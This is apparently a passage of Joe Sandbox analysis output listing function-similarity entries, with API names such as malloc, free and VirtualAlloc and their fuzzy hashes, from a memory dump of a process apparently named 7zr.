                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: memmove
                                                          • String ID:
                                                          • API String ID: 2162964266-0
                                                          • Opcode ID: ed249ee924b42af0abd0b936601cf7d20be81bb0e5d72fcf70d319d92c18dab8
                                                          • Instruction ID: cbf9e08a5555efca76e0e3ee0de8521240d211f30687367cbea6b668dc3c7d75
                                                          • Opcode Fuzzy Hash: ed249ee924b42af0abd0b936601cf7d20be81bb0e5d72fcf70d319d92c18dab8
                                                          • Instruction Fuzzy Hash: 34814C71E0424AAFCF14CFA8C584AEEBBB1BF48324F54956AE512A7341D771EA80CF50
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: malloc
                                                          • String ID:
                                                          • API String ID: 2803490479-0
                                                          • Opcode ID: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                                                          • Instruction ID: 10ec1b3ccdf6cefded33c2c02c9dd30b4434cfe30a9cc7523912114a8053f0f8
                                                          • Opcode Fuzzy Hash: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                                                          • Instruction Fuzzy Hash: AFD0C9A162360706EF484A30484BB6A22D46B5031BBA885F8AC16CB291FB19D61D9258
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000), ref: 00B56B31
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 41b6787ff6aeb38a8c4cb08e5eddf1ceada6a52224bc52a2eaed526b7f7a511a
                                                          • Instruction ID: 8fb7cd5613bafa0fad3d47cb14245c26c4587c61b45aac685d9cd313bcac4a26
                                                          • Opcode Fuzzy Hash: 41b6787ff6aeb38a8c4cb08e5eddf1ceada6a52224bc52a2eaed526b7f7a511a
                                                          • Instruction Fuzzy Hash: E7C02BE1A4D280DFDF0213109C40B603F308F83300F0A00C9E4085B0D3C6041C0CC763
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: malloc
                                                          • String ID:
                                                          • API String ID: 2803490479-0
                                                          • Opcode ID: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                                                          • Instruction ID: 30ff8c9d703fd4a00493e18c0eabbf5a437b67ce6d430cfa31e7bfbfb9121104
                                                          • Opcode Fuzzy Hash: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                                                          • Instruction Fuzzy Hash: 4DA024CD51304101FD1C11303C0153710C013503077C014FC7C05C1101F71DD50C1045
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: malloc
                                                          • String ID:
                                                          • API String ID: 2803490479-0
                                                          • Opcode ID: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                                                          • Instruction ID: 97405230ee4d15145f56f5fc1024e26be198807dd6f96e103afc8d5aa350bdf3
                                                          • Opcode Fuzzy Hash: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                                                          • Instruction Fuzzy Hash: CAA012CCE01041019D0510343801523209262E06067D4C4F4680441105FA18D0082002
                                                          APIs
                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00B56BAC
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: FreeVirtual
                                                          • String ID:
                                                          • API String ID: 1263568516-0
                                                          • Opcode ID: c71393416eb581057df679bdbce22aea3b3503c94bd6930371ea89c13b27bcd0
                                                          • Instruction ID: 3ed933a70754ddf7c160f5ec3e37cb5af69f306637f534c82e83248d5d04292f
                                                          • Opcode Fuzzy Hash: c71393416eb581057df679bdbce22aea3b3503c94bd6930371ea89c13b27bcd0
                                                          • Instruction Fuzzy Hash: 5EA00278680700B7ED6067307D4FF593B247780F05F30854CB2456A0D06EE474849A9C
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: free
                                                          • String ID:
                                                          • API String ID: 1294909896-0
                                                          • Opcode ID: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                                                          • Instruction ID: 5452a898c97e844988764aa120d4d33733afd57307042e931e9337a0e5f31690
                                                          • Opcode Fuzzy Hash: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                                                          • Instruction Fuzzy Hash:
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: free
                                                          • String ID:
                                                          • API String ID: 1294909896-0
                                                          • Opcode ID: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                                                          • Instruction ID: 5b16a8d25c558cd32ec97ef78b788b6af3345034608741ba6ca8814f4e76a3f3
                                                          • Opcode Fuzzy Hash: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                                                          • Instruction Fuzzy Hash: